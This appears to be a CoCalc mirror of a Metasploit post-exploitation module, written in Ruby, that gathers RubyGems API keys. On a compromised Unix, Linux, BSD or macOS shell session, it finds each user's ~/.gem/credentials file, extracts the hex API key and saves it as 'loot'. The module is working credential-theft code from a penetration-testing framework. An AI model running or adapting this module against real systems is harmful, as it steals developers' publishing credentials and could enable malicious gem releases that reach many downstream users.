CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/rubygems_api_key.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Unix

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Multi Gather RubyGems API Key',

15
        'Description' => %q{

16
          This module obtains a user's RubyGems API key from ~/.gem/credentials.

17
        },

18
        'Author' => [

19
          'Jonathan Claudius <jclaudius[at]trustwave.com>',

20
          'Brandon Myers <bmyers[at]trustwave.com>'

21
        ],

22
        'Platform' => %w[bsd linux osx unix],

23
        'SessionTypes' => %w[shell],

24
        'License' => MSF_LICENSE

25
      )

26
    )

27
  end

28


29
  def run

30
    print_status('Finding ~/.gem/credentials')

31
    paths = enum_user_directories.map { |d| d + '/.gem/credentials' }

32
    paths = paths.select { |f| file?(f) }

33


34
    if paths.empty?

35
      print_error('No users found with a ~/.gem/credentials file')

36
      return

37
    end

38


39
    download_key(paths)

40
  end

41


42
  # Ruby gem credentials are pretty standard and can come

43
  # in a few flavors, but the most common are straight yaml

44
  # and json, both of which are colon delimited. I suppose

45
  # you could concievably have more than one, but that'd be

46
  # manually editing, and the first one is probably the best

47
  # one anyway.

48
  def extract_key(path)

49
    data = read_file(path)

50
    keys = data.split(':').select { |k| k =~ /[0-9a-f]{32}/ }

51
    keys.map(&:strip).first

52
  end

53


54
  def download_key(paths)

55
    print_status("Looting #{paths.count} files")

56
    paths.each do |path|

57
      path.chomp!

58
      next if ['.', '..'].include?(path)

59


60
      rubygems_api_key = extract_key(path)

61
      next unless rubygems_api_key

62


63
      print_good("Found a RubyGems API key: #{rubygems_api_key}")

64


65
      loot_path = store_loot(

66
        'rubygems.apikey',

67
        'text/plain',

68
        session,

69
        rubygems_api_key,

70
        'rubygems_api_key.txt',

71
        'RubyGems API key'

72
      )

73


74
      print_good("RubyGems API key stored in #{loot_path}")

75
    end

76
  end

77
end

78


79